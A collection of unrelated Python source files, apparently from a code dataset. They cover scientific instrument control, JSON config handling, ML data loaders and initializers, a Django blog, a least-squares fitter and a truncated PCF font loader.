DESCR = """
This example uses **Pulse Streamer** to emulate signals for fluorescence correlation spectroscopy (FCS).
The example demonstrates autocorrelation measurement with logarithmic binning.
* Channel 1 - fluorescence photons
"""
import random as rnd
def pattFCS(cells, counts, window, time):
cell_period = int(window/cells-time)
photon_period = int(time/counts)
pattern = [(0, 0)]
for c in range(cells):
rnd_counts = rnd.randint(int(0.8*counts), int(1.2*counts))
for i in range(rnd_counts):
pattern.append((3, 1))
            tag = rnd.randint(3, int(2*photon_period))
pattern.append((tag, 0))
skip = rnd.randint(3, int(2*cell_period))
pattern.append((skip, 0))
return pattern
def main(pulsestreamer_ip='192.168.178.128'):
""" This is the main function of the example.
Parameters:
pulsestreamer_ip - IP address of the Pulse Streamer.
The default value corresponds to the
direct connection of the Pulse Streamer
to the network card of your PC.
"""
# import API classes into the current namespace
from pulsestreamer import PulseStreamer
# connect to the Pulse Streamer
ps = PulseStreamer(pulsestreamer_ip)
# create a sequence-object
sequence = ps.createSequence()
# parameters for FCS pattern
n_cells = 10
em_counts = 1000
meas_window = 1e9 # in ns, 1s
pass_time = 1e5 # in ns, 100us
# generate new pattern every second and stream
while True:
# generate and assign the pattern to a digital output of PS
patt1 = pattFCS(n_cells, em_counts, meas_window, pass_time)
sequence.setDigital(1, patt1)
ps.stream(sequence, 1)
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# ___ _ ___ ___ _ |
# / _ \ __| |_ ___| _ \/ __| | | Create 8-bit-like games!
# | (_) / _| _/ _ \ _/ (_ |_| | Author: Death_Miner
# \___/\__|\__\___/_| \___(_) | Version: 0.4.0
# |
#
# @ octopg/data.py => Handles multiple data files
# We use the JSON format for all data files.
import json
import os
# Current opened files list
files = {}
# Current data of files
d = {}
"""
init()
Loads the required files for the octopg engine
@return void
"""
def init():
# We load the main config file
load_file("config", "data/config.json", "data/config.default.json")
"""
load_file()
Loads a data file and decodes it
@param name (str) The name to use for this file
@param path (str) Path of the data file
@param default_path (str) Path of the default data file
@return void
"""
def load_file(name, path, default_path = None):
global files, d
# Do some debug for the developers
print("- Loading '"+name+"' data file")
print(" => "+path)
# Load only the file once
if name not in files:
# Get the path of the default file
        if default_path is None:
# Generate the path of the default data file.
# It should be (original basename)/(original filename).default.(original extension)
default_file = os.path.basename(path).split(".")
default_file.insert(-1, "default")
default_path = os.path.dirname(path) + "/" + ".".join(default_file)
# Check if the config file exists
if os.path.exists(path):
# Open this file
with open(path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# The file doesn't exists, try to open a default config file
elif os.path.exists(default_path):
# Open this file
with open(default_path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# We didn't find any file... Shame!
else:
print("File not found.")
# Show this when file already loaded
else:
print("File already loaded.")
"""
save_file()
Saves a data file
@param name (str) The name of the data file
@return void
"""
def save_file(name):
global files, d
# Do some debug for the developers
print("- Saving '"+name+"' data file")
print(" => "+files[name])
    # Check first if the file was loaded
if name in files:
# Open the file and write the new JSON encoded data
with open(files[name], "w") as f:
f.write(json.dumps(d[name], sort_keys=True, indent=4))
# Debug
print("Done.")
# The file is not loaded, we can't save it obviously
else:
print("File not loaded.")
"""
close_file()
Saves a data file and close it (removes it from the list)
@param name (str) The name of the data file
@return void
"""
def close_file(name):
global files, d
# Do some debug for the developers
print("- Closing '"+name+"' data file")
# Check first is file was loaded
if name in files:
# Save the file
save_file(name)
# Delete the data & file from memory
del d[name]
del files[name]
# Debug
print("Done.")
# The file is not loaded, we can't close it obviously
else:
print("File not loaded.")
"""
close_all()
Closes all the opened data files
@return void
"""
def close_all():
# list of files to close
to_close = [name for name in files]
# Close them all
for name in to_close:
close_file(name)
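# --- Usage sketch (illustrative only) ---
# Demonstrates the load/modify/save/close cycle on a throwaway file rather
# than the real data/config.json that init() expects. The file name and the
# "volume" key are assumptions made up for this demo.
if __name__ == "__main__":
    with open("demo.json", "w") as f:
        f.write(json.dumps({"volume": 7}))
    load_file("demo", "demo.json")
    d["demo"]["volume"] = 11
    close_all()  # saves demo.json with volume == 11 and forgets it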
|
nilq/baby-python
|
python
|
__all__ = [
"same"
, "same_attrs"
# Can be used to implement interface of `same`.
# __same__ = same_{implementation}
, "same_vectors"
, "same_sets"
, "same_mappings"
]
from types import (
GeneratorType
)
from six.moves import (
zip_longest
)
try:
    from collections.abc import Mapping
except ImportError:  # Python 2 fallback (the module supports Py2 via six)
    from collections import Mapping
class End(object):
"Allows `same_vectors` to support iterators."
__same__ = lambda *_ : False
end = End
def same_vectors(a, b):
"Recursive. Order sensitive. Complexity is O(min(len(a), len(b)) + 1)."
for ea, eb in zip_longest(a, b, fillvalue = end):
if not same(ea, eb):
return False
return True
def same_sets(a, b):
"Recursive. Ignores order. Complexity is O(len(a) * len(b))."
restb = list(b)
for ea in a:
for i, eb in enumerate(restb):
if same(ea, eb):
del restb[i]
break
else:
return False
return not restb
def same_mappings(a, b):
"Recursive. Ignores order. Complexity is O(min(len(a), len(b)))."
restb = set(b)
for ka in a:
if ka in b:
ea = a[ka]
eb = b[ka]
if same(ea, eb):
restb.remove(ka)
continue
return False
return not restb
def _is_b_iterable(checker):
def wrapper(a, b):
# Iterables or not? See: https://stackoverflow.com/a/1952481/7623015
try:
_ = (e for e in b)
except TypeError:
# This duck does not quack.
return False
return checker(a, b)
wrapper.__doc__ = checker.__doc__
return wrapper
def _is_b_mapping(checker):
def wrapper(a, b):
if isinstance(b, Mapping):
return checker(a, b)
return False
wrapper.__doc__ = checker.__doc__
return wrapper
# Exact type match. Inherited classes must provide __same__.
SAME_ALG = {
dict : _is_b_mapping(same_mappings),
list : _is_b_iterable(same_sets),
set : _is_b_iterable(same_sets),
GeneratorType : _is_b_iterable(same_sets),
tuple : _is_b_iterable(same_vectors)
}
def _l_same_r(l, r):
try:
__same__ = l.__same__
except AttributeError:
return NotImplemented
return __same__(r)
def same(a, b):
""" Compares a and b using `__same__` method.
At least one of the objects must define it.
Else, there are comparators for several standard container types (see below).
If a comparator is absent, base Python comparison mechanism is involved.
Ex.:
class AClass(ItsParent):
def __same__(self, other):
# Look for a semantic difference then return `False`.
return True # NotImplemented (same result as when no `__same__`)
    This allows implementing a user-defined comparison that does not influence
    standard Python operations,
    e.g. operators such as `==` and `in` (and using objects as keys in hash
    based mappings).
    I.e. with this suite it is possible to store semantically same objects
    inside one mapping because they still appear different to Python.
    It also allows an object to be changed after it has been used as a key
    (unless the object defines a custom `__eq__` or `__hash__`).
    For the last reason an `id(obj)` expression result could be used as a key
    instead, but that is quite inconvenient and gives no way to obtain the
    reference back from its id.
"""
res = _l_same_r(a, b)
if res is NotImplemented:
res = _l_same_r(b, a)
if res is NotImplemented:
try:
alg = SAME_ALG[type(a)]
except KeyError:
try:
alg = SAME_ALG[type(b)]
except KeyError:
# redirect to base Python comparison mechanism
res = a == b
else:
res = alg(b, a)
else:
res = alg(a, b)
return res
same.__doc__ += "\nSupported for those container types:\n\n%s" % ("\n\n".join(
cls.__name__ + "\n " + alg.__doc__ for cls, alg in SAME_ALG.items()
))
def same_attrs(a, b, *attrs):
for name in attrs:
if not same(getattr(a, name), getattr(b, name)):
return False
return True
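# --- Usage sketch (illustrative only) ---
# A class opts into semantic comparison by defining `__same__`; Python's own
# comparison (identity by default here) is left untouched. `Point` is a made-up
# example class, not part of this module.
if __name__ == "__main__":
    class Point(object):
        def __init__(self, x, y):
            self.x, self.y = x, y
        def __same__(self, other):
            return same_attrs(self, other, "x", "y")

    p, q = Point(1, 2), Point(1, 2)
    assert same(p, q)        # semantically equal
    assert p != q            # default comparison still sees two objects
    assert same([p], [q])    # container comparators recurse through `same`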
|
nilq/baby-python
|
python
|
from pathlib import Path
from jinja2 import Environment
from jinja2.loaders import BaseLoader
import requests
import json
req = requests.get(r"https://raw.githubusercontent.com/thautwarm/DianaScript-JIT/master/sigs-for-builtin-modules.json")
if req.status_code != 200:
raise IOError("cannot read json spec from remote repo")
SPEC = json.loads(req.text)
env = Environment(
loader = BaseLoader(),
extensions=['jinja2.ext.do'],
trim_blocks=True,
lstrip_blocks=True
)
def find_paths(p: Path):
if not p.is_dir():
if p.suffix == ".in":
yield p
else:
for i in p.iterdir():
if i == p:
continue
yield from find_paths(i)
py_map = {
'Tuple': 'tuple',
'string': 'str'
}
env.filters['each'] = lambda f: lambda seq: map(f, seq)
def assert_(x):
assert x
import builtins
namespace = {**builtins.__dict__, **globals()}
for FROM, TO in [
(path, path.with_suffix("")) for path in find_paths(Path(__file__).parent.parent)
]:
try:
template = env.from_string(FROM.open(encoding='utf8').read())
s = template.render(**namespace)
TO.open('w', encoding='utf8').write(s)
print(TO, "written")
except:
print("error ocurred at", FROM)
raise
|
nilq/baby-python
|
python
|
import torch
from torch.utils.data import Dataset
import numpy as np
class MNISTGraphDataset(Dataset):
def __init__(self, dataset_path, num_thresholded, train=True, intensities=True, num=-1):
        if train:
dataset_tr = np.loadtxt(dataset_path + 'mnist_train.csv', delimiter=',', dtype=np.float32)
dataset_te = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
dataset = np.concatenate((dataset_tr, dataset_te), axis=0)
else:
dataset = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
print("MNIST CSV Loaded")
if isinstance(num, list):
map1 = list(map(lambda x: x in num, dataset[:, 0]))
dataset = dataset[map1]
elif num > -1:
dataset = dataset[dataset[:, 0] == num]
print(dataset.shape)
X_pre = (dataset[:, 1:] - 127.5) / 255.0
imrange = np.linspace(-0.5, 0.5, num=28, endpoint=False)
xs, ys = np.meshgrid(imrange, imrange)
xs = xs.reshape(-1)
ys = ys.reshape(-1)
self.X = np.array(list(map(lambda x: np.array([xs, ys, x]).T, X_pre)))
        if not intensities:
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:, :2], self.X)))
else:
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:], self.X)))
self.X = torch.FloatTensor(self.X)
print(self.X.shape)
print("Data Processed")
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
return self.X[idx]
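# --- Usage sketch (illustrative only) ---
# Assumes mnist_train.csv / mnist_test.csv (label followed by 784 pixel values
# per row) live under ./data/. Each item is a (num_thresholded, 3) point cloud
# of (x, y, intensity) rows for the brightest pixels of one digit.
if __name__ == "__main__":
    from torch.utils.data import DataLoader
    ds = MNISTGraphDataset("data/", num_thresholded=100, train=False, num=3)
    loader = DataLoader(ds, batch_size=32, shuffle=True)
    print(next(iter(loader)).shape)  # -> torch.Size([32, 100, 3])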
|
nilq/baby-python
|
python
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""init weights"""
import math
import numpy as np
from mindspore.common import initializer as init
from mindspore.common.initializer import _assignment
from mindspore.common.initializer import _calculate_correct_fan
from mindspore.common.initializer import _calculate_fan_in_and_fan_out
from mindspore.common.initializer import _calculate_gain
class KaimingUniform(init.Initializer):
"""
Initialize the array with He kaiming algorithm.
Args:
a: the negative slope of the rectifier used after this layer (only
used with ``'leaky_relu'``)
mode: either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity: the non-linear function, recommended to use only with
``'relu'`` or ``'leaky_relu'`` (default).
"""
def __init__(self, a=math.sqrt(5), mode='fan_in', nonlinearity='leaky_relu'):
super().__init__()
self.mode = mode
self.gain = _calculate_gain(nonlinearity, a)
def _initialize(self, arr):
fan = _calculate_correct_fan(arr.shape, self.mode)
bound = math.sqrt(3.0) * self.gain / math.sqrt(fan)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
class UniformBias(init.Initializer):
"""bias uniform initializer"""
def __init__(self, shape):
super().__init__()
self.shape = shape
def _initialize(self, arr):
fan_in, _ = _calculate_fan_in_and_fan_out(self.shape)
bound = 1 / math.sqrt(fan_in)
data = np.random.uniform(-bound, bound, arr.shape)
_assignment(arr, data)
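# --- Usage sketch (illustrative only; shapes are arbitrary assumptions) ---
# The initializers plug into mindspore.common.initializer.initializer(), which
# builds a tensor of the requested shape; UniformBias takes the weight shape
# so it can derive fan_in for the bias bound.
if __name__ == "__main__":
    import mindspore
    w = init.initializer(KaimingUniform(), [64, 3, 7, 7], mindspore.float32)
    b = init.initializer(UniformBias(shape=[64, 3 * 7 * 7]), [64], mindspore.float32)
    print(w.shape, b.shape)  # prints the two tensor shapes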
|
nilq/baby-python
|
python
|
from collections.abc import Mapping, Iterable
import copy as copy_
import numpy as np
import datetime as dt
from . import misc
def select_var(d, name, sel):
var_dims = list(d['.'][name]['.dims'])
d['.'][name]['.dims'] = var_dims
for key, value in sel.items():
if isinstance(value, Mapping):
if len(sel) > 1: raise ValueError('invalid selector')
newdim = key
dims = value.keys()
idxs = value.values()
selector = tuple([
idxs[dims.index(var_dim)] if var_dim in dims else slice(None)
for var_dim in var_dims
])
d[name] = d[name][selector]
for dim in dims:
if dim in var_dims:
var_dims.remove(dim)
d['.'][name]['.dims'].append(newdim)
else:
dim, idxs = key, value
idxs = np.array(idxs) if type(idxs) in (list, tuple) else idxs
            if isinstance(idxs, np.ndarray) and idxs.dtype == np.bool_:
idxs = np.nonzero(idxs)[0]
if dim in var_dims:
i = var_dims.index(dim)
d[name] = np.take(d[name], idxs, axis=i)
if not isinstance(idxs, np.ndarray):
var_dims.remove(dim)
def filter_hidden(x):
if isinstance(x, Mapping):
return {k: v for k, v in x.items() if not k.startswith('.')}
if isinstance(x, Iterable):
return [k for k in x if not k.startswith('.')]
return x
def select(d, sel):
for name in d.keys():
if name.startswith('.'):
continue
select_var(d, name, sel)
def get_dims(d, name=None):
if name is None:
dims = {}
for name in get_vars(d):
data = get_var(d, name)
for i, dim in enumerate(get_dims(d, name)):
dims[dim] = data.shape[i]
return dims
else:
try: return d['.'][name]['.dims']
except KeyError: return gen_dims(d, name)
def get_vars(d):
return filter_hidden(d.keys())
def get_var(d, name):
data = d[name]
if type(data) is np.ndarray:
return data
else:
return np.array(data)
def get_meta(d, name=None):
if name is None:
return d.get('.', {})
else:
try: return d['.'][name]
except KeyError: return {}
def get_attrs(d, name=None):
if name is None:
try: return filter_hidden(d['.']['.'])
except KeyError: return {}
else:
try: return filter_hidden(d['.'][name])
except KeyError: return {}
def gen_dims(d, name):
data = get_var(d, name)
return [name + ('_%d' % i) for i in range(1, data.ndim + 1)]
def parse_time(t):
formats = [
'%Y-%m-%d %H:%M:%S.%f',
'%Y-%m-%d %H:%M:%S',
'%Y-%m-%dT%H:%M:%SZ',
]
for f in formats:
try: return dt.datetime.strptime(t, f)
        except ValueError: pass
return None
def time_dt(time):
return [parse_time(t) for t in time]
def merge_var(dd, var, dim):
if len(dd) == 0:
return None, None
x0 = dd[0][var]
meta0 = dd[0]['.'][var]
dims0 = meta0['.dims']
meta = copy_.deepcopy(meta0)
if dim in dims0:
i = dims0.index(dim)
x = np.concatenate(
[d[var] for d in dd if d['.'][var]['.dims'] == dims0],
axis=i
)
else:
meta['.dims'] = [dim] + list(meta['.dims'])
x = np.stack([d[var] for d in dd if d['.'][var]['.dims'] == dims0])
return x, meta
def merge(dd, dim, new=None, variables=None):
dx = {'.': {'.': {}}}
vars_ = list(set([x for d in dd for x in get_vars(d)]))
dims = [k for d in dd for k in get_dims(d).keys()]
is_new = dim not in dims
for var in vars_:
var_dims = get_dims(dd[0], var)
if is_new and (variables is None or var in variables) or \
dim in var_dims:
x, meta = merge_var(dd, var, dim)
elif new is not None and (variables is None or var in variables):
x, meta = merge_var(dd, var, new)
else:
x, meta = dd[0][var], dd[0]['.'][var]
dx[var] = x
dx['.'][var] = meta
for d in dd:
if '.' in d['.']:
dx['.']['.'].update(d['.']['.'])
return dx
def rename_dim(d, old, new):
if old == new:
return
if '.' in d:
for var in d['.'].keys():
meta = d['.'][var]
if '.dims' in d['.'][var]:
dims = d['.'][var]['.dims']
for i, dim in enumerate(dims):
if dim == old:
dims[i] = new
def rename(d, old, new):
if old == new:
return
if old in d:
d[new] = d[old]
d['.'][new] = d['.'][old]
del d[old]
del d['.'][old]
rename_dim(d, old, new)
def copy(d):
d2 = {}
for var in get_vars(d):
d2[var] = d[var]
d2['.'] = copy_.deepcopy(d['.'])
return d2
def group_by(d, dim, group, func):
groups = sorted(list(set(group)))
vars = get_vars(d)
n = len(groups)
for var in vars:
dims = d['.'][var]['.dims']
try:
i = dims.index(dim)
except ValueError:
continue
size = list(d[var].shape)
size[i] = n
x = np.empty(size, d[var].dtype)
for j, g in enumerate(groups):
mask = group == g
slice_x = misc.sel_slice({dim: j}, dims)
slice_y = misc.sel_slice({dim: mask}, dims)
y = d[var][slice_y]
x[slice_x] = func(y, axis=i)
d[var] = x
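# Minimal usage sketch of the dataset-dict convention used above: variables are
# top-level keys, metadata lives under '.', and dimension names sit in '.dims'.
# The dict below is hypothetical.
#
#     d = {
#         'temperature': np.zeros((3, 4)),
#         '.': {'temperature': {'.dims': ['time', 'station']}},
#     }
#     select(d, {'time': [0, 2]})   # keep time steps 0 and 2
#     get_dims(d)                   # -> {'time': 2, 'station': 4}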
|
nilq/baby-python
|
python
|
import json
import os
from typing import Callable
import imageio
import numpy as np
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import pathlib
import torch
from torchvision import datasets, transforms
from torchvision.datasets.mnist import read_label_file, read_image_file
from args import args
def clearline():
CURSOR_UP_ONE = "\x1b[1A"
ERASE_LINE = "\x1b[2K"
print(CURSOR_UP_ONE + ERASE_LINE + CURSOR_UP_ONE)
def input2label(x: torch.Tensor) -> torch.LongTensor:
"""
- Convert a torch array containing floats to contain ints
- The continuous values of 'x' are binned based on n_bins set at args.py
- This will turn our problem of predicting the next pixel value to
a classification problem (instead of regression)
"""
return torch.squeeze(torch.round((args.n_bins - 1) * x).type(torch.LongTensor), 1)
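# Illustrative note (values hypothetical): with args.n_bins == 4, a pixel
# intensity of 0.34 maps to class round(3 * 0.34) = 1, so a float image in
# [0, 1] becomes an integer label map with values in {0, 1, 2, 3}.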
def tile_images(images: np.array, n_rows=0) -> np.array:
n_images = len(images)
height = images[0].shape[1]
width = images[0].shape[2]
if n_rows == 0:
n_rows = int(np.floor(np.sqrt(n_images)))
while n_images % n_rows != 0:
n_rows -= 1
n_cols = n_images // n_rows
images = np.squeeze(np.array(images), axis=1)
images = np.transpose(images, (1, 2, 0))
images = np.reshape(images, [height, width, n_rows, n_cols])
images = np.transpose(images, (2, 3, 0, 1))
images = np.concatenate(images, 1)
images = np.concatenate(images, 1)
return images
def plot_stats(stats, savepath: str) -> None:
"""
Make all the plots in stats. Stats can be a dict or a path to json (str)
"""
if type(stats) is str:
assert os.path.isfile(stats)
with open(stats, "r") as sf:
stats = json.load(sf)
assert type(stats) is dict, "stats must be a dictionary"
if not os.path.isdir(savepath):
os.makedirs(savepath)
def _plot(y, title):
        plt.figure()
if type(y) is list:
plt.plot(range(1, len(y) + 1), y)
elif type(y) is dict:
for key, z in y.items():
plt.plot(range(1, len(z) + 1), z, label=key)
plt.legend()
else:
raise ValueError
plt.xlabel("Epoch")
plt.ylabel(title)
plt.title(title)
plt.savefig(os.path.join(savepath, title.replace(" ", "_") + ".png"))
plt.close()
# Loop over stats dict and plot. Dicts within stats get plotted together.
for key, value in stats.items():
_plot(value, key)
def get_label2onehot(n_classes: int) -> Callable:
def label2onehot(target_class_index):
one_hot_vector = np.zeros((n_classes), dtype="float32")
one_hot_vector[target_class_index] = 1
return one_hot_vector
return label2onehot
def augment(rotate=5):
return transforms.Compose(
[transforms.RandomRotation(rotate), transforms.ToTensor()]
)
def data_loader(dataset, batch_size, n_workers=8):
assert dataset.lower() in ["mnist", "fashionmnist"]
loader_args = {
"batch_size": batch_size,
"num_workers": n_workers,
"pin_memory": True,
}
datapath = os.path.join(os.getenv("HOME"), "data", dataset.lower())
dataset_args = {
"root": datapath,
"download": True,
"transform": transforms.ToTensor(),
}
if dataset.lower() == "mnist":
dataset_init = datasets.MNIST
n_classes = 10
else:
dataset_init = datasets.FashionMNIST
n_classes = 10
label2onehot = get_label2onehot(n_classes)
dataset_args.update({"target_transform": label2onehot})
val_loader = torch.utils.data.DataLoader(
dataset_init(train=False, **dataset_args), shuffle=False, **loader_args
)
dataset_args["transform"] = augment()
train_loader = torch.utils.data.DataLoader(
dataset_init(train=True, **dataset_args), shuffle=True, **loader_args
)
return train_loader, val_loader, label2onehot, n_classes
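# Hedged usage sketch (assumes args.py is configured and the dataset may be
# downloaded to $HOME/data): the loaders behave like any torch DataLoader.
#
#     train_loader, val_loader, label2onehot, n_classes = data_loader("mnist", 64)
#     x, y = next(iter(train_loader))   # x: (64, 1, 28, 28), y: (64, 10) one-hot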
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render,redirect
from django.http import HttpResponse
from .models import Blogs
from .forms import Create
def add_blog(request):
if request.method == "POST":
addBlog = Create(request.POST, request.FILES)
if addBlog.is_valid():
addBlog.save()
return redirect('blog:blogHome')
else:
addBlog = Create()
return render(request, 'blog/create.html', {'addBlog':addBlog})
def blogHome(request):
blogs = Blogs.objects.all().order_by('date')
return render(request, 'blog/blogHome.html', {'blogs':blogs})
def blog_detail(request,slug):
blog = Blogs.objects.get(slug=slug)
return render(request, 'blog/blog_detail.html', {'blog':blog})
def delete_blog(request, slug):
    Blogs.objects.filter(slug=slug).delete()
return redirect('blog:blogHome')
|
nilq/baby-python
|
python
|
###############################################################################
# Copyright (c) 2007-2018, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
"""Linear least-squares fitter.
:author: Ludwig Schwardt
:license: Modified BSD
"""
from __future__ import division
import warnings
import numpy as np
from .generic import ScatterFit, NotFittedError
# ----------------------------------------------------------------------------------------------------------------------
# --- CLASS : LinearLeastSquaresFit
# ----------------------------------------------------------------------------------------------------------------------
class LinearLeastSquaresFit(ScatterFit):
r"""Fit linear regression model to data using the SVD.
This fits a linear function of the form :math:`y = p^T x` to a sequence of
N P-dimensional input vectors :math:`x` and a corresponding sequence of N
output measurements :math:`y`. The input to the fitter is presented as an
input *design matrix* :math:`X` of shape (P, N) and an N-dimensional output
*measurement vector* :math:`y`. The P-dimensional *parameter vector*
:math:`p` is determined by the fitting procedure. The fitter can use
uncertainties on the `y` measurements and also produces a covariance matrix
for the parameters. The number of parameters, P, is determined by the shape
of :math:`X` when :meth:`fit` is called.
Parameters
----------
rcond : float or None, optional
Relative condition number of the fit. Singular values smaller than this
relative to the largest singular value will be ignored. The default
value is N * eps, where eps is the relative precision of the float
type, about 2e-16 in most cases, and N is length of output vector `y`.
Attributes
----------
params : array of float, shape (P,)
Fitted parameter vector
cov_params : array of float, shape (P, P)
Standard covariance matrix of parameters
Notes
-----
The :meth:`fit` method finds the optimal parameter vector :math:`p` that
minimises the sum of squared weighted residuals, given by
.. math:: \chi^2 = \sum_{i=1}^N \left[\frac{y_i - \sum_{j=1}^P p_j x_{ji}}{\sigma_i}\right]^2
where :math:`x_{ji}` are the elements of the design matrix :math:`X` and
:math:`\sigma_i` is the uncertainty associated with measurement
:math:`y_i`. The problem is solved using the singular-value decomposition
(SVD) of the design matrix, based on the description in Section 15.4 of
[1]_. This gives the same parameter solution as the NumPy function
:func:`numpy.linalg.lstsq`, but also provides the covariance matrix of the
parameters.
.. [1] Press, Teukolsky, Vetterling, Flannery, "Numerical Recipes in C,"
Second Edition, 1992.
"""
def __init__(self, rcond=None):
ScatterFit.__init__(self)
self.rcond = rcond
self.params = None
self.cov_params = None
def fit(self, x, y, std_y=1.0):
"""Fit linear regression model to x-y data using the SVD.
Parameters
----------
x : array-like, shape (P, N)
Known input values as design matrix (one row per desired parameter)
y : array-like, shape (N,)
Known output measurements as sequence or numpy array
std_y : float or array-like, shape (N,), optional
Measurement error or uncertainty of `y` values, expressed as
standard deviation in units of `y`
Returns
-------
self : :class:`LinearLeastSquaresFit` object
Reference to self, to allow chaining of method calls
"""
x = np.atleast_2d(np.asarray(x))
y = np.atleast_1d(np.asarray(y))
# Convert uncertainty into array of shape (N,)
if np.isscalar(std_y):
std_y = np.tile(std_y, y.shape)
std_y = np.atleast_1d(np.asarray(std_y))
# Lower bound on uncertainty is determined by floating-point
# resolution (no upper bound)
np.clip(std_y, max(np.mean(np.abs(y)), 1e-20) * np.finfo(y.dtype).eps,
np.inf, out=std_y)
# Normalise uncertainty to avoid numerical blow-up
# (only relative uncertainty matters for parameter solution)
max_std_y = std_y.max()
std_y /= max_std_y
# Weight design matrix columns and output vector by `y` uncertainty
A = x / std_y[np.newaxis, :]
b = y / std_y
# Perform SVD on A, which is transpose of usual design matrix -
# let A^T = Ur S V^T to correspond with NRinC
# Shapes: A ~ PxN, b ~ N, V ~ PxP, s ~ P, S = diag(s) ~ PxP,
# "reduced U" Ur ~ NxP and Urt = Ur^T ~ PxN
V, s, Urt = np.linalg.svd(A, full_matrices=False)
# Set all "small" singular values below this relative cutoff equal to 0
s_cutoff = (len(x) * np.finfo(x.dtype).eps * s[0]
if self.rcond is None else self.rcond * s[0])
# Warn if the effective rank < P
# (i.e. some singular values are considered to be zero)
if np.any(s < s_cutoff):
warnings.warn('Least-squares fit may be poorly conditioned')
# Invert zero singular values to infinity, as we are actually
# interested in reciprocal of s, and zero singular values should be
# replaced by zero reciprocal values a la pseudo-inverse
s[s < s_cutoff] = np.inf
# Solve linear least-squares problem using SVD
# (see NRinC, 2nd ed, Eq. 15.4.17)
# In matrix form: p = V S^(-1) Ur^T b = Vs Ur^T b, where Vs = V S^(-1)
Vs = V / s[np.newaxis, :]
self.params = np.dot(Vs, np.dot(Urt, b))
# Also obtain covariance matrix of parameters
# (see NRinC, 2nd ed, Eq. 15.4.20)
# In matrix form: Cp = V S^(-2) V^T = Vs Vs^T
# (also rescaling with max std_y)
self.cov_params = np.dot(Vs, Vs.T) * (max_std_y ** 2)
return self
def __call__(self, x, full_output=False):
"""Evaluate linear regression model on new x data.
Parameters
----------
x : array-like, shape (P, M)
New input values as design matrix (one row per fitted parameter)
full_output : {False, True}, optional
True if output uncertainty should also be returned
Returns
-------
y : array, shape (M,)
Corresponding output of function as a numpy array
std_y : array, shape (M,), optional
Uncertainty of function output, expressed as standard deviation
"""
if (self.params is None) or (self.cov_params is None):
raise NotFittedError("Linear regression model not fitted to data "
"yet - first call .fit method")
A = np.atleast_2d(np.asarray(x))
y = np.dot(self.params, A)
if full_output:
return y, np.sqrt(np.sum(A * np.dot(self.cov_params, A), axis=0))
else:
return y
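# Minimal usage sketch (illustrative, not part of the original module): fit a
# straight line y = m*x + c by stacking the regressor and a constant row into
# the (P, N) design matrix that fit() expects.
if __name__ == '__main__':
    x = np.linspace(0.0, 10.0, 50)
    X = np.vstack([x, np.ones_like(x)])            # design matrix, shape (2, 50)
    y = 3.0 * x - 2.0 + 0.1 * np.random.randn(50)  # noisy line
    fitter = LinearLeastSquaresFit().fit(X, y, std_y=0.1)
    print(fitter.params)                           # approximately [3.0, -2.0]
    y_pred, y_std = fitter(X, full_output=True)    # predictions with 1-sigma errors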
|
nilq/baby-python
|
python
|
from typing import Sequence
from deeppavlov.models.tokenizers.utils import detokenize
from core.state_schema import Dialog
from annotators.person.person_normalizer import PersonNormalizer
class DefaultPostprocessor:
def __init__(self) -> None:
self.person_normalizer = PersonNormalizer(per_tag='PER')
def __call__(self, dialogs: Sequence[Dialog]) -> Sequence[str]:
new_responses = []
for d in dialogs:
# get tokens & tags
response = d['utterances'][-1]
ner_annotations = response['annotations']['ner']
user_name = d['user']['profile']['name']
# replace names with user name
if ner_annotations and (response['active_skill'] == 'chitchat'):
response_toks_norm, _ = \
self.person_normalizer([ner_annotations['tokens']],
[ner_annotations['tags']],
[user_name])
response_toks_norm = response_toks_norm[0]
# detokenize
new_responses.append(detokenize(response_toks_norm))
else:
new_responses.append(response['text'])
return new_responses
|
nilq/baby-python
|
python
|
# SPDX-FileCopyrightText: 2020 Jeff Epler for Adafruit Industries
#
# SPDX-License-Identifier: MIT
"""
`adafruit_bitmap_font.pcf`
====================================================
Loads PCF format fonts.
* Author(s): Jeff Epler
Implementation Notes
--------------------
**Hardware:**
**Software and Dependencies:**
* Adafruit CircuitPython firmware for the supported boards:
https://github.com/adafruit/circuitpython/releases
"""
from collections import namedtuple
import gc
import struct
from fontio import Glyph
from .glyph_cache import GlyphCache
_PCF_PROPERTIES = 1 << 0
_PCF_ACCELERATORS = 1 << 1
_PCF_METRICS = 1 << 2
_PCF_BITMAPS = 1 << 3
_PCF_INK_METRICS = 1 << 4
_PCF_BDF_ENCODINGS = 1 << 5
_PCF_SWIDTHS = 1 << 6
_PCF_GLYPH_NAMES = 1 << 7
_PCF_BDF_ACCELERATORS = 1 << 8
_PCF_DEFAULT_FORMAT = 0x00000000
_PCF_INKBOUNDS = 0x00000200
